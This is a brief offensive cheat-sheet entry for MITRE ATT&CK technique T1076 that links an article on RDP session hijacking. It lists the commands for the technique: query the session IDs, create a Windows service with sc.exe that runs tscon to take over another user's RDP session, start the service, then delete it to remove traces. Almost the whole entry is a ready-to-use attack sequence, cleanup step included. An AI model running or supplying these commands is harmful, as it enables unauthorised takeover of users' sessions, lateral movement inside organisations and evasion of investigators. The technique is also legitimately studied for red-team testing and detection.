## Remote Desktop Protocol MITRE ATT&CK Technique: [T1076](https://attack.mitre.org/wiki/Technique/T1076) ### [RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) — how to hijack RDS and RemoteApp sessions transparently to move through an organization retrieve the session ID: query user Set the session ID and rdp-tcp# retrieved from `query user` sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55" Access the session: net start sesshijack Clean up afterward: sc.exe delete sesshijack